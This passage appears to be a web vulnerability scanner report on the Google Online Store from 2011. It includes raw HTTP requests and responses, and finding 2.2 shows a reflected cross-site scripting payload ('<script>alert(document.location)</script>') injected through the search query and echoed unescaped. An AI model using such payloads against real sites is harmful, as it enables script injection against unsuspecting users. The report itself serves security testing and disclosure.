<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '7208';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';

ga.isNew = 'no';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

2.2. http://www.googlestore.com/googlesearch.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/googlesearch.aspx

Request

POST /googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0 HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.43.9.1319224888597; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 2709

__VIEWSTATE=%2FwEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAWxAzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc%2BQmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmFzY2VuZGluZyc%2BUHJpY2UgKCQtJCQkKTwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmRlc2NlbmRpbmcnPlByaWNlICgkJCQtJCk8L2E%2BPGJyLz5kAgEPFgIeB1Zpc2libGVoFgICAQ8WAh8AZWQCAg8WAh8BaBYCAgEPFgIfAGVkAgMPFgIfAWgWAgIBDxYCHwBlZAIEDxYCHwBlZAIFDxYCHwAF0QI8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweCc%2BSG9tZTwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQnLz5hY2Nlc3NvcmllczwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMnLz54c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQ8L2E%2BZAIGDxYCHwBlZAIHDxYCHwAFnQI8aDI%2BPGNlbnRlcj5EaWQgeW91IG1lYW4gPGk%2BPGZvbnQgY29sb3I9J2JsdWUnID4gPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMmeD0wJnk9MCZxPXhzcyAxMjMgNDU2IDc4OTAgZjNkOCBzY3JpcHQgYWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdCAxNzM0OWYzNzQ4NCcvPiB4c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQ8L2E%2BPzwvZm9udD48L2k%2BPC9oMj48L2NlbnRlcj5kAggPFgIfAAWKATxkaXYgY2xhc3M9Im5vLXJlc3VsdHMiPk5vIFJlc3VsdHMgRm91bmQgZm9yIHNlYXJjaCA8aT54c3MgMTIzIDQ1NiA3ODkwZjNkOGE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTwvc2NyaXB0PjE3MzQ5ZjM3NDg0PC9pPjwvZGl2PmQCCQ9kFgICAQ9kFgICAw8PFgIeCEltYWdlVXJsBRYvaW1hZ2VzL2J0bl9zaWdudXAuZ2lmZGQCCw8WAh8ABakDaHR0cHM6Ly93d3cuZ29vZ2xlYXBpcy5jb20vc2hvcHBpbmcvc2VhcmNoL3YxL2N4OjAxNjQ1ODUwMTY0NTg4NDA1NzkxMjpkcV9peGJ3aHVrOC9wcm9kdWN0cz9mYWNldHMuZW5hYmxlZD10cnVlJmNvdW50cnk9dXMmbWF4UmVzdWx0cz0xMiZmYWNldHMudXNlR2NzQ29uZmlnPVRydWUmZmFjZXRzLmRpc2NvdmVyPTEwMDoxMDAmYWx0PWF0b20mc3BlbGxpbmcuZW5hYmxlZD10cnVlJnByb21vdGlvbnMuZW5hYmxlZD10cnVlJnByb21vdGlvbnMudXNlR2NzQ29uZmlnPXRydWUma2V5PUFJemFTeUNTSk1hdjZheWdqbFYzenUwdmw0MGpick1oZEtmRmNybyZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YXNjcmlwdGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQxNzM0OWYzNzQ4NCZyZXN0cmljdEJ5PWdzY2F0ZWdvcnkodGV4dCk6YWNjZXNzb3JpZXNkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRNjdGxTaWdudXAkYnRuU2lnblVw&__EVENTVALIDATION=%2FwEWAwLdgJGXBAKs4eTNDgK6oZTsCg%3D%3D&ctlSignup%24EmailAddress=cdd&ctlSignup%24btnSignUp.x=37&ctlSignup%24btnSignUp.y=7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20325
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:22:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Google Online Store :: Product Search</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name='keywords' content='Google Online Store' />
<meta http-equiv="pragma" content="no-cache">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<meta name='description' content='Google Online Store' />
<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
<link href="/css/main.css" rel="stylesheet" type="text/css" />
<link href="/css/home.css" rel="stylesheet" type="text/css" />
    

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<style type="text/css">
.filterBox a{
line-height:18px;
font-size:11px;
}

.facet_holder
{
margin:8px 0px;
}
.no-results{ font-weight:bold; font-size:1.3em; margin-bottom:25px; text-align:center}
</style>
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

</head>
<body>
<div id="wrapper">
<div id="header" style="height:70px">
<a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>
<div style="position:absolute; top:0; right:0px; width:90px; height:52px;">
<a href="/googlesearch.aspx?category=you tube"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
</div>
<ul>
<li><a href="/googlesearch.aspx/?category=youtube">You Tube Home</a></li>
<li><a href="http://www.google.com">Google Search</a></li>
<li><a href="http://www.google.com/about.html">About Google</a></li>
</ul>
</div>

<div id="left_content">
<div id="box-round">
<div class="top"><span><h2 class="side_head">Search Filters</h2></span></div>
<div class="center-content">
<div class="filterBox">
<div id="divsort_holder" class="facet_holder" style="margin-top:0px;">
<b>Sort By:</b><br/>
<div id="divsort" name="divsort"><a href='googlesearch.aspx?'>Best Match</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0&rankBy=price:ascending'>Price ($-$$$)</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0&rankBy=price:descending'>Price ($$$-$)</a><br/></div>
</div>

<div class="facet_holder">
<b>Shop By Other:</b><br />
<div id="divshop" name="divshop">
<a href="googlesearch.aspx?topseller=yes">Top Sellers</a><br />
<a href="googlesearch.aspx?isnew=yes">What's New</a><br />
<a href="googlesearch.aspx?category=eco">Eco-Friendly Items</a><br />
<a href="googlesearch.aspx?specials=yes">Specials</a>
</div>
</div>

</div> 
</div> 

<div class="bottom"><span></span></div>
</div> 
</div> 

<div id="content">
<script language="javascript">
function ajaxGetRequest(url, divName) {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Loading search results</h1><div style=\"height:40px;padding-top:10px;\"><p id=\"indicator\" style=\"margin-top:0px;\"><img src=\"/images/indicator.gif\" /> Loading...</p></div>");

$.ajax({
url: url,
cache: true,
success: function (html) {
var isValid = html.indexOf("<div id=\"\products\">");
if (isValid != -1) {
$("#" + divName).empty().html(html);
} else {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Search results</h1>An error occurred. Try to search on the right-hand navigation for the products you are looking for.</div>");
}
}
})

}
</script>

<div id="products">

<div id="category-head">
<form method="GET" name="search" id="search" action="googlesearch.aspx" style="font-size:15px;">
<b>Search:</b>
<select name="category" style="font-size:13px;">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" selected>Accessories</option>
<option value="office" >Office</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

<br />
<a href="/Specials/"><img border="0" src='/content/BannerImages/youtubesalebanner.jpg' alt=''></a>
<br />
<div style="position:relative">

<h1>Accessories</h1>
<div style="clear:left"></div>
</div>

<div id="top_paging">

<div class="paging_top" style="padding-right:15px;">
<div id="pagenav" name="pagename"></div>
</div>
<div id="divbreadcrumbs" name="divbreadcrumbs"><a href='googlesearch.aspx'>Home</a> / <a href='googlesearch.aspx?q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484'/>accessories</a> / <a href='googlesearch.aspx?category=accessories'/>xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484</a></div>
</div>

<div style="clear:both"> </div>

<div id="divpromotions" name="divpromotions"></div>
<div id="divspell" name="divspell"><h2><center>Did you mean <i><font color='blue' > <a href='googlesearch.aspx?category=accessories&x=0&y=0&q=xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484'/> xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484</a>?</font></i></h2></center></div>
<div id="divsearchresults" name="divsearchresults"><div class="no-results">No Results Found for search <i>xss 123 456 7890f3d8a<script>alert(document.location)</script>17349f37484</i></div></div>

<div class="paging_bottom" id="pagenav_bottom"></div>
</div>
</div>
</div>

<div id="right_content">

<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="ctlSignup_Label1" class="formerror">Invalid Email Format</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAWxAzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc+QmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmFzY2VuZGluZyc+UHJpY2UgKCQtJCQkKTwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmRlc2NlbmRpbmcnPlByaWNlICgkJCQtJCk8L2E+PGJyLz5kAgEPFgIeB1Zpc2libGVoFgICAQ8WAh8AZWQCAg8WAh8BaBYCAgEPFgIfAGVkAgMPFgIfAWgWAgIBDxYCHwBlZAIEDxYCHwBlZAIFDxYCHwAF0QI8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweCc+SG9tZTwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/cT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQnLz5hY2Nlc3NvcmllczwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/Y2F0ZWdvcnk9YWNjZXNzb3JpZXMnLz54c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQ8L2E+ZAIGDxYCHwBlZAIHDxYCHwAFnQI8aDI+PGNlbnRlcj5EaWQgeW91IG1lYW4gPGk+PGZvbnQgY29sb3I9J2JsdWUnID4gPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/Y2F0ZWdvcnk9YWNjZXNzb3JpZXMmeD0wJnk9MCZxPXhzcyAxMjMgNDU2IDc4OTAgZjNkOCBzY3JpcHQgYWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdCAxNzM0OWYzNzQ4NCcvPiB4c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQ8L2E+PzwvZm9udD48L2k+PC9oMj48L2NlbnRlcj5kAggPFgIfAAWKATxkaXYgY2xhc3M9Im5vLXJlc3VsdHMiPk5vIFJlc3VsdHMgRm91bmQgZm9yIHNlYXJjaCA8aT54c3MgMTIzIDQ1NiA3ODkwZjNkOGE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTwvc2NyaXB0PjE3MzQ5ZjM3NDg0PC9pPjwvZGl2PmQCCQ9kFgRmDw8WBh4IQ3NzQ2xhc3MFCWZvcm1lcnJvch4EVGV4dAUUSW52YWxpZCBFbWFpbCBGb3JtYXQeBF8hU0ICAmRkAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkAgsPFgIfAAWpA2h0dHBzOi8vd3d3Lmdvb2dsZWFwaXMuY29tL3Nob3BwaW5nL3NlYXJjaC92MS9jeDowMTY0NTg1MDE2NDU4ODQwNTc5MTI6ZHFfaXhid2h1azgvcHJvZHVjdHM/ZmFjZXRzLmVuYWJsZWQ9dHJ1ZSZjb3VudHJ5PXVzJm1heFJlc3VsdHM9MTImZmFjZXRzLnVzZUdjc0NvbmZpZz1UcnVlJmZhY2V0cy5kaXNjb3Zlcj0xMDA6MTAwJmFsdD1hdG9tJnNwZWxsaW5nLmVuYWJsZWQ9dHJ1ZSZwcm9tb3Rpb25zLmVuYWJsZWQ9dHJ1ZSZwcm9tb3Rpb25zLnVzZUdjc0NvbmZpZz10cnVlJmtleT1BSXphU3lDU0pNYXY2YXlnamxWM3p1MHZsNDBqYnJNaGRLZkZjcm8mcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGFzY3JpcHRhbGVydChkb2N1bWVudC5sb2NhdGlvbikvc2NyaXB0MTczNDlmMzc0ODQmcmVzdHJpY3RCeT1nc2NhdGVnb3J5KHRleHQpOmFjY2Vzc29yaWVzZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUTY3RsU2lnbnVwJGJ0blNpZ25VcA==" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwKyipXaCwKs4eTNDgK6oZTsCg==" />
</div>
<input name="ctlSignup$EmailAddress" type="text" value="cdd" maxlength="50" id="ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="ctlSignup$btnSignUp" id="ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" >
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>

<div class="center-content">
<ul class="store-links">
<li><a style="font-size:11px;" href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact">Customer Service</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>
<li><a style="font-size:11px;" href="/Mini/"><b>Google Mini</b></a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
<li class="nav off"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href="googlesearch.aspx?category=accessories" >Accessories</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href="googlesearch.aspx?category=fun" >Fun</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href="googlesearch.aspx?category=kids" >Kids</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href="googlesearch.aspx?category=office" >Office</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href="googlesearch.aspx?category=wearables" >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a>
</ul>
</div>

<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
</div>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");

</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="http://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script>
<script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</body>
</html>

2.3. http://www.googlestore.com/shop.axd/PrivacyPolicy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/shop.axd/PrivacyPolicy

Request

GET /shop.axd/PrivacyPolicy HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.18.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12810
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:01:28 GMT

